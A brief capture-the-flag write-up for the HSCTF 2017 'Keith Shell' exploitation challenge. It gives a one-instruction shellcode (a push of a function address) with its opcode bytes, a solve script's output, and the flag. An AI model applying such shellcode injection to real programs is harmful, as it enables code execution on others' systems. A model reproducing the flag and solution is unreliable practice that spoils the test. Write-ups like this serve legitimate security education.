HSCTF_2017: Keith Shell

Category: Exploitation Points: 100 Description:

Help Keith write a shellcode to get a flag! Netcat to


We just need to craft some shellcode to jump to exploit() of address 0x80489fb. So something like this will be sufficient

push 0x80489fb

Translated to opcodes, we get

\x68 \xfb\x89\x04\x08

We now have a solution.

$ ./solve.py 
[+] Opening connection to on port 8003: Done
Flag: 9qCzj0cNsRuwyT6HLIz8RAuBp3NMQ1Bdwm2F2CtquuXea5X0lOWKQ4FeU5fJ

[*] Closed connection to port 8003

Therefore, the flag is 9qCzj0cNsRuwyT6HLIz8RAuBp3NMQ1Bdwm2F2CtquuXea5X0lOWKQ4FeU5fJ.